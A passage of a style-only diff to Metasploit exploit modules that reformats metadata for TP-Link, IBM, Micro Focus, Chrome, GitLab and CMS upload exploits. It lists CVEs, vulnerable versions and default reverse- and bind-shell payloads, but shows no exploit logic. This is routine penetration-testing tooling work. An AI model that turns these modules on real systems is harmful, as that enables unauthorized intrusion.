+        ],
         'Privileged' => true,
         'Platform' => 'linux',
         'Arch' => ARCH_MIPSBE,
         'Payload' => {},
         'Stance' => Msf::Exploit::Stance::Aggressive,
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
-            'WfsDelay' => 15
-          },
-        'Targets' =>
-          [
-            [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)', {} ]
-          ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
+          'WfsDelay' => 15
+        },
+        'Targets' => [
+          [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware up to 201029/30)', {} ]
+        ],
         'DisclosureDate' => '2020-03-25',
         'DefaultTarget' => 0
       )

--- a/modules/exploits/linux/ssh/ibm_drm_a3user.rb
+++ b/modules/exploits/linux/ssh/ibm_drm_a3user.rb
@@ -21,30 +21,26 @@ class MetasploitModule < Msf::Exploit::Remote
           Versions <= 2.0.6.1 are confirmed to be vulnerable.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
-          ],
-        'References' =>
-          [
-            [ 'CVE', '2020-4429' ], # insecure default password
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
-            [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
-            [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/']
-          ],
-        'Payload' =>
-          {
-            'Compat' => {
-              'PayloadType' => 'cmd_interact',
-              'ConnectionType' => 'find'
-            }
-          },
+        'Author' => [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2020-4429' ], # insecure default password
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm_drm/ibm_drm_rce.md' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2020/Apr/33' ],
+          [ 'URL', 'https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-exist-in-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430/']
+        ],
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
-        'Targets' =>
-          [
-            [ 'IBM Data Risk Manager <= 2.0.6.1', {} ]
-          ],
+        'Targets' => [
+          [ 'IBM Data Risk Manager <= 2.0.6.1', {} ]
+        ],
         'Privileged' => true,
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-04-21'

--- a/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
+++ b/modules/exploits/linux/ssh/microfocus_obr_shrboadmin.rb
@@ -25,34 +25,29 @@ class MetasploitModule < Msf::Exploit::Remote
           Note that this is only exploitable in Linux installations.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
-          ],
-        'References' =>
-          [
-            [ 'CVE', '2020-11857' ],
-            [ 'ZDI', '20-1215' ],
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md' ],
-            [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03710590' ],
-          ],
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'thread'
-          },
-        'Payload' =>
-          {
-            'Compat' => {
-              'PayloadType' => 'cmd_interact',
-              'ConnectionType' => 'find'
-            }
-          },
+        'Author' => [
+          'Pedro Ribeiro <pedrib[at]gmail.com>'        # Vulnerability discovery and Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2020-11857' ],
+          [ 'ZDI', '20-1215' ],
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md' ],
+          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03710590' ],
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
+        },
+        'Payload' => {
+          'Compat' => {
+            'PayloadType' => 'cmd_interact',
+            'ConnectionType' => 'find'
+          }
+        },
         'Platform' => 'unix',
         'Arch' => ARCH_CMD,
-        'Targets' =>
-          [
-            [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],
-          ],
+        'Targets' => [
+          [ 'Micro Focus Operations Bridge Reporter (Linux) versions <= 10.40', {} ],
+        ],
         'Privileged' => false,
         'DefaultTarget' => 0,
         'DisclosureDate' => '2020-09-21'

--- a/modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
+++ b/modules/exploits/linux/ssh/vyos_restricted_shell_privesc.rb
@@ -37,8 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Rich Mirch', # discovery and exploit
           'bcoles' # metasploit
         ],
-        'References' =>
-        [
+        'References' => [
           [ 'CVE', '2018-18556' ],
           [ 'URL', 'https://blog.vyos.io/the-operator-level-is-proved-insecure-and-will-be-removed-in-the-next-releases' ],
           [ 'URL', 'https://blog.mirch.io/2018/11/05/cve-2018-18556-vyos-privilege-escalation-via-sudo-pppd-for-operator-users/' ],
@@ -46,15 +45,13 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Arch' => ARCH_CMD,
         'DisclosureDate' => '2018-11-05',
-        'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'Payload' => 'cmd/unix/reverse_bash'
         },
         'DefaultTarget' => 0,
         'Platform' => 'unix',
         'Privileged' => true,
-        'Targets' =>
-        [
+        'Targets' => [
           [
             'Automatic', {}
           ]

--- a/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
+++ b/modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb
@@ -38,21 +38,18 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Arch' => [ ARCH_X64 ],
         'DefaultTarget' => 0,
-        'Payload' =>
-        {
+        'Payload' => {
           'Space' => 4096
         },
-        'Notes' =>
-        {
+        'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
           'SideEffects' => [ IOC_IN_LOGS ]
         },
-        'Targets' =>
-          [
-            ['Linux - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'linux' }],
-            ['Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'win' }],
-            ['macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'osx' }],
-          ],
+        'Targets' => [
+          ['Linux - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'linux' }],
+          ['Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'win' }],
+          ['macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'osx' }],
+        ],
         'DisclosureDate' => '2021-04-13'
       )
     )

--- a/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
+++ b/modules/exploits/multi/browser/chrome_simplifiedlowering_overflow.rb
@@ -36,21 +36,18 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Arch' => [ ARCH_X64 ],
         'DefaultTarget' => 0,
-        'Payload' =>
-        {
+        'Payload' => {
           'Space' => 4096
         },
-        'Notes' =>
-        {
+        'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
           'SideEffects' => [ IOC_IN_LOGS ]
         },
-        'Targets' =>
-          [
-            ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],
-            ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],
-            ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],
-          ],
+        'Targets' => [
+          ['Linux - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'linux' }],
+          ['Windows 10 - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'win' }],
+          ['macOS - Google Chrome 87.0.4280.66 (64 bit)', { 'Platform' => 'osx' }],
+        ],
         'DisclosureDate' => '2020-11-19'
       )
     )

--- a/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
+++ b/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
@@ -21,28 +21,24 @@ class MetasploitModule < Msf::Exploit::Remote
           privileged.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'gwillcox-r7', # Metasploit module
-            'xorathustra', # Original advisory and PoC
-          ],
-        'References' =>
-          [
-            ['URL', 'https://github.com/pear/Archive_Tar/issues/33'],
-            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949'],
-            ['CVE', '2020-28949']
-          ],
-        'DefaultOptions' =>
-          {
-            'EXITFUNC' => 'thread',
-            'DisablePayloadHandler' => true
-          },
+        'Author' => [
+          'gwillcox-r7', # Metasploit module
+          'xorathustra', # Original advisory and PoC
+        ],
+        'References' => [
+          ['URL', 'https://github.com/pear/Archive_Tar/issues/33'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949'],
+          ['CVE', '2020-28949']
+        ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'DisablePayloadHandler' => true
+        },
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,
-        'Targets' =>
-          [
-            ['Archive_Tar <= 1.4.10', {}]
-          ],
+        'Targets' => [
+          ['Archive_Tar <= 1.4.10', {}]
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2020-11-17'
       )

--- a/modules/exploits/multi/http/apache_flink_jar_upload_exec.rb
+++ b/modules/exploits/multi/http/apache_flink_jar_upload_exec.rb
@@ -26,36 +26,32 @@ class MetasploitModule < Msf::Exploit::Remote
           1.11.2 on Windows 10.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Henry Chen', # Initial technique demonstration and writeup
-            'bigger.wing', # Python exploit
-            'bcoles' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['EDB', '48978'],
-            ['PACKETSTORM', '159779'],
-            ['URL', 'https://github.com/biggerwing/apache-flink-unauthorized-upload-rce-'],
-            ['URL', 'https://s.tencent.com/research/bsafe/841.html'],
-            ['URL', 'https://cloud.tencent.com/developer/article/1540439'],
-            ['URL', 'https://nsfocusglobal.com/advisory-apache-flink-remote-code-execution-vulnerability/'],
-          ],
+        'Author' => [
+          'Henry Chen', # Initial technique demonstration and writeup
+          'bigger.wing', # Python exploit
+          'bcoles' # Metasploit module
+        ],
+        'References' => [
+          ['EDB', '48978'],
+          ['PACKETSTORM', '159779'],
+          ['URL', 'https://github.com/biggerwing/apache-flink-unauthorized-upload-rce-'],
+          ['URL', 'https://s.tencent.com/research/bsafe/841.html'],
+          ['URL', 'https://cloud.tencent.com/developer/article/1540439'],
+          ['URL', 'https://nsfocusglobal.com/advisory-apache-flink-remote-code-execution-vulnerability/'],
+        ],
         'Platform' => 'java',
         'Arch' => [ARCH_JAVA],
-        'Targets' =>
-          [
-            ['Automatic', {}]
-          ],
+        'Targets' => [
+          ['Automatic', {}]
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2019-11-13',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
-            'Stability' => [ CRASH_SAFE ],
-            'Reliability' => [ REPEATABLE_SESSION]
-          }
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ REPEATABLE_SESSION]
+        }
       )
     )
 

--- a/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
+++ b/modules/exploits/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce.rb
@@ -28,34 +28,31 @@ class MetasploitModule < Msf::Exploit::Remote
           'Grant Willcox' # Metasploit module
         ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['CVE', '2019-11580'],
-            ['URL', 'https://jira.atlassian.com/browse/CWD-5388'],
-            ['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'],
-            ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
-          ],
+        'References' => [
+          ['CVE', '2019-11580'],
+          ['URL', 'https://jira.atlassian.com/browse/CWD-5388'],
+          ['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'],
+          ['URL', 'https://www.corben.io/atlassian-crowd-rce/']
+        ],
         'Platform' => %w[java],
         'Arch' => ARCH_JAVA,
         'DefaultOptions' => {
           'HttpClientTimeout' => 25 # Allow a bit more time for the file upload to complete, just in case things are delayed, before timing out.
         },
-        'Notes' =>
-          {
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ],
-            'Stability' => [ CRASH_SAFE ]
-          },
-        'Targets' =>
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ]
+        },
+        'Targets' => [
           [
-            [
-              'Java Universal',
-              {
-                'Arch' => ARCH_JAVA,
-                'Platform' => 'java'
-              }
-            ]
-          ],
+            'Java Universal',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => 'java'
+            }
+          ]
+        ],
         'DisclosureDate' => '2019-05-22'
       )
     )

--- a/modules/exploits/multi/http/atutor_upload_traversal.rb
+++ b/modules/exploits/multi/http/atutor_upload_traversal.rb
@@ -37,20 +37,17 @@ class MetasploitModule < Msf::Exploit::Remote
           (XAMPP server).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'liquidsky (JMcPeters)', # PoC
-            'Erik Wynter' # @wyntererik - Metasploit
-          ],
-        'References' =>
-          [
-            ['CVE', '2019-12169'],
-            ['URL', 'https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit/'] # PoC
-          ],
+        'Author' => [
+          'liquidsky (JMcPeters)', # PoC
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2019-12169'],
+          ['URL', 'https://github.com/fuzzlove/ATutor-2.2.4-Language-Exploit/'] # PoC
+        ],
         'Platform' => %w[linux win],
         'Arch' => [ ARCH_X86, ARCH_X64 ],
-        'Targets' =>
-        [
+        'Targets' => [
           [ 'Auto', {} ],
           [
             'Linux', {

--- a/modules/exploits/multi/http/baldr_upload_exec.rb
+++ b/modules/exploits/multi/http/baldr_upload_exec.rb
@@ -28,58 +28,54 @@ class MetasploitModule < Msf::Exploit::Remote
           uploading the malicious ZIP file.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Ege Balcı <egebalci@pm.me>' # author & msf module
-          ],
-        'References' =>
-          [
-            ['URL', 'https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/'],
-            ['URL', 'https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/'],
-            ['URL', 'https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf'],
-          ],
-        'DefaultOptions' =>
-          {
-            'SSL' => false,
-            'WfsDelay' => 5
-          },
+        'Author' => [
+          'Ege Balcı <egebalci@pm.me>' # author & msf module
+        ],
+        'References' => [
+          ['URL', 'https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/'],
+          ['URL', 'https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/'],
+          ['URL', 'https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf'],
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
         'Platform' => [ 'php' ],
         'Arch' => [ ARCH_PHP ],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Auto',
-              {
-                'Platform' => 'PHP',
-                'Arch' => ARCH_PHP,
-                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
-              }
-            ],
-            [
-              '<= v2.0',
-              {
-                'Platform' => 'PHP',
-                'Arch' => ARCH_PHP,
-                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
-              }
-            ],
-            [
-              'v2.2',
-              {
-                'Platform' => 'PHP',
-                'Arch' => ARCH_PHP,
-                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
-              }
-            ],
-            [
-              'v3.0 & v3.1',
-              {
-                'Platform' => 'PHP',
-                'Arch' => ARCH_PHP,
-                'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
-              }
-            ]
+            'Auto',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
+            }
           ],
+          [
+            '<= v2.0',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
+            }
+          ],
+          [
+            'v2.2',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
+            }
+          ],
+          [
+            'v3.0 & v3.1',
+            {
+              'Platform' => 'PHP',
+              'Arch' => ARCH_PHP,
+              'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/bind_tcp' }
+            }
+          ]
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2018-12-19',
         'DefaultTarget' => 0

--- a/modules/exploits/multi/http/cockpit_cms_rce.rb
+++ b/modules/exploits/multi/http/cockpit_cms_rce.rb
@@ -27,37 +27,32 @@ class MetasploitModule < Msf::Exploit::Remote
           for exploitation.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'h00die', # msf module
-            'Nikita Petrov' # original PoC, analysis
-          ],
-        'References' =>
-          [
-            [ 'URL', 'https://swarm.ptsecurity.com/rce-cockpit-cms/' ],
-            [ 'CVE', '2020-35847' ], # reset token extraction
-            [ 'CVE', '2020-35846' ], # user name extraction
-          ],
+        'Author' => [
+          'h00die', # msf module
+          'Nikita Petrov' # original PoC, analysis
+        ],
+        'References' => [
+          [ 'URL', 'https://swarm.ptsecurity.com/rce-cockpit-cms/' ],
+          [ 'CVE', '2020-35847' ], # reset token extraction
+          [ 'CVE', '2020-35846' ], # user name extraction
+        ],
         'Platform' => ['php'],
         'Arch' => ARCH_PHP,
         'Privileged' => false,
-        'Targets' =>
-          [
-            [ 'Automatic Target', {}]
-          ],
-        'DefaultOptions' =>
-          {
-            'PrependFork' => true
-          },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultOptions' => {
+          'PrependFork' => true
+        },
         'DisclosureDate' => '2021-04-13',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            # ACCOUNT_LOCKOUTS due to reset of user password
-            'SideEffects' => [ ACCOUNT_LOCKOUTS, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ],
-            'Stability' => [ CRASH_SERVICE_DOWN ]
-          }
+        'Notes' => {
+          # ACCOUNT_LOCKOUTS due to reset of user password
+          'SideEffects' => [ ACCOUNT_LOCKOUTS, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SERVICE_DOWN ]
+        }
       )
     )
 

--- a/modules/exploits/multi/http/git_lfs_clone_command_exec.rb
+++ b/modules/exploits/multi/http/git_lfs_clone_command_exec.rb
@@ -35,29 +35,26 @@ class MetasploitModule < Msf::Exploit::Remote
           'Matheus Tavares', # Discovery
           'Shelby Pace' # Metasploit module
         ],
-        'References' =>
-          [
-            [ 'CVE', '2021-21300' ],
-            [ 'URL', 'https://seclists.org/fulldisclosure/2021/Apr/60' ],
-            [ 'URL', 'https://twitter.com/Foone/status/1369500506469527552?s=20' ]
-          ],
+        'References' => [
+          [ 'CVE', '2021-21300' ],
+          [ 'URL', 'https://seclists.org/fulldisclosure/2021/Apr/60' ],
+          [ 'URL', 'https://twitter.com/Foone/status/1369500506469527552?s=20' ]
+        ],
         'DisclosureDate' => '2021-04-26',
         'Platform' => [ 'unix' ],
         'Arch' => ARCH_CMD,
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Git for MacOS, Windows',
-              {
-                'Platform' => [ 'unix' ],
-                'Arch' => ARCH_CMD,
-                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
-              }
-            ]
-          ],
+            'Git for MacOS, Windows',
+            {
+              'Platform' => [ 'unix' ],
+              'Arch' => ARCH_CMD,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+            }
+          ]
+        ],
         'DefaultTarget' => 0,
-        'Notes' =>
-        {
+        'Notes' => {
           'Stability' => [ CRASH_SAFE ],
           'Reliability' => [ REPEATABLE_SESSION ],
           'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ]

--- a/modules/exploits/multi/http/gitlab_file_read_rce.rb
+++ b/modules/exploits/multi/http/gitlab_file_read_rce.rb
@@ -350,18 +350,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
           Tested on GitLab 12.8.1 and 12.4.0.
         },
-        'Author' =>
-          [
-            'William Bowling (vakzz)', # Discovery + PoC
-            'alanfoster', # msf module
-          ],
+        'Author' => [
+          'William Bowling (vakzz)', # Discovery + PoC
+          'alanfoster', # msf module
+        ],
         'License' => MSF_LICENSE,
-        'References' =>
-          [
-            ['CVE', '2020-10977'],
-            ['URL', 'https://hackerone.com/reports/827052'],
-            ['URL', 'https://about.gitlab.com/releases/2020/03/26/security-release-12-dot-9-dot-1-released/']
-          ],
+        'References' => [
+          ['CVE', '2020-10977'],
+          ['URL', 'https://hackerone.com/reports/827052'],
+          ['URL', 'https://about.gitlab.com/releases/2020/03/26/security-release-12-dot-9-dot-1-released/']
+        ],
         'DisclosureDate' => '2020-03-26',
         'Platform' => 'ruby',
         'Arch' => ARCH_RUBY,

--- a/modules/exploits/multi/http/horizontcms_upload_exec.rb
+++ b/modules/exploits/multi/http/horizontcms_upload_exec.rb
@@ -39,50 +39,46 @@ class MetasploitModule < Msf::Exploit::Remote
           1.0.0-beta running on Ubuntu 18.04.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Erik Wynter' # @wyntererik - Discovery and Metasploit
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-27387']
-          ],
-        'Payload' =>
-          {
-            'BadChars' => "\x00\x0d\x0a"
-          },
+        'Author' => [
+          'Erik Wynter' # @wyntererik - Discovery and Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-27387']
+        ],
+        'Payload' => {
+          'BadChars' => "\x00\x0d\x0a"
+        },
         'Platform' => %w[linux win php],
         'Arch' => [ ARCH_X86, ARCH_X64, ARCH_PHP],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'PHP', {
-                'Arch' => [ARCH_PHP],
-                'Platform' => 'php',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'php/meterpreter/reverse_tcp'
-                }
+            'PHP', {
+              'Arch' => [ARCH_PHP],
+              'Platform' => 'php',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
               }
-            ],
-            [
-              'Linux', {
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'Platform' => 'linux',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-                }
-              }
-            ],
-            [
-              'Windows', {
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'Platform' => 'win',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-                }
-              }
-            ]
+            }
           ],
+          [
+            'Linux', {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows', {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'win',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2020-09-24',
         'DefaultTarget' => 0

--- a/modules/exploits/multi/http/kong_gateway_admin_api_rce.rb
+++ b/modules/exploits/multi/http/kong_gateway_admin_api_rce.rb
@@ -22,16 +22,14 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'License' => MSF_LICENSE,
         'Author' => ['Graeme Robinson'],
-        'References' =>
-        [
+        'References' => [
           ['URL', 'https://konghq.com/'],
           ['URL', 'https://github.com/Kong/kong'],
           ['URL', 'https://docs.konghq.com/hub/kong-inc/serverless-functions/']
         ],
         'Platform' => %w[linux macos],
         'Arch' => [ARCH_X86, ARCH_X64],
-        'Targets' =>
-        [
+        'Targets' => [
           [
             'Unix (In-Memory)',
             {

--- a/modules/exploits/multi/http/maracms_upload_exec.rb
+++ b/modules/exploits/multi/http/maracms_upload_exec.rb
@@ -35,52 +35,48 @@ class MetasploitModule < Msf::Exploit::Remote
           7.5 running on Windows Server 2012 (XAMPP server).
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'Michele Cisternino', # aka (0blio_) - discovery and PoC
-            'Erik Wynter' # @wyntererik - Metasploit
-          ],
-        'References' =>
-          [
-            ['CVE', '2020-25042'],
-            ['EDB', '48780']
-          ],
-        'Payload' =>
-          {
-            'BadChars' => "\x00\x0d\x0a"
-          },
+        'Author' => [
+          'Michele Cisternino', # aka (0blio_) - discovery and PoC
+          'Erik Wynter' # @wyntererik - Metasploit
+        ],
+        'References' => [
+          ['CVE', '2020-25042'],
+          ['EDB', '48780']
+        ],
+        'Payload' => {
+          'BadChars' => "\x00\x0d\x0a"
+        },
         'Platform' => %w[linux win php],
         'Arch' => [ ARCH_X86, ARCH_X64, ARCH_PHP],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'PHP', {
-                'Arch' => [ARCH_PHP],
-                'Platform' => 'php',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'php/meterpreter/reverse_tcp'
-                }
+            'PHP', {
+              'Arch' => [ARCH_PHP],
+              'Platform' => 'php',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
               }
-            ],
-            [
-              'Linux', {
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'Platform' => 'linux',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
-                }
-              }
-            ],
-            [
-              'Windows', {
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'Platform' => 'win',
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-                }
-              }
-            ]
+            }
           ],
+          [
+            'Linux', {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows', {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'win',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
         'Privileged' => false,
         'DisclosureDate' => '2020-08-31',
         'DefaultTarget' => 0

--- a/modules/exploits/multi/http/microfocus_obm_auth_rce.rb
+++ b/modules/exploits/multi/http/microfocus_obm_auth_rce.rb
@@ -27,16 +27,14 @@ class MetasploitModule < Msf::Exploit::Remote
           exploit this vulnerability, even the lowest privileged ones.
           For more information refer to the advisory link below.
         },
-        'Author' =>
-        [
+        'Author' => [
           'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
         ],
-        'References' =>
-          [
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
-            [ 'CVE', '2020-11853'],
-            [ 'ZDI', '20-1327'],
-          ],
+        'References' => [
+          [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
+          [ 'CVE', '2020-11853'],
+          [ 'ZDI', '20-1327'],
+        ],
         'DisclosureDate' => '2020-10-28',
         'License' => MSF_LICENSE,
         'Platform' => 'java',

--- a/modules/exploits/multi/http/microfocus_ucmdb_unauth_deser.rb
+++ b/modules/exploits/multi/http/microfocus_ucmdb_unauth_deser.rb
@@ -28,45 +28,41 @@ class MetasploitModule < Msf::Exploit::Remote
           Both Windows and Linux installations are vulnerable.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-        [
+        'Author' => [
           'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability discovery and Metasploit module
         ],
-        'References' =>
-          [
-            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBM.md'],
-            [ 'CVE', '2020-11853'],
-            [ 'CVE', '2020-11854'],
-            [ 'ZDI', '20-1287'],
-            [ 'ZDI', '20-1288'],
-          ],
+        'References' => [
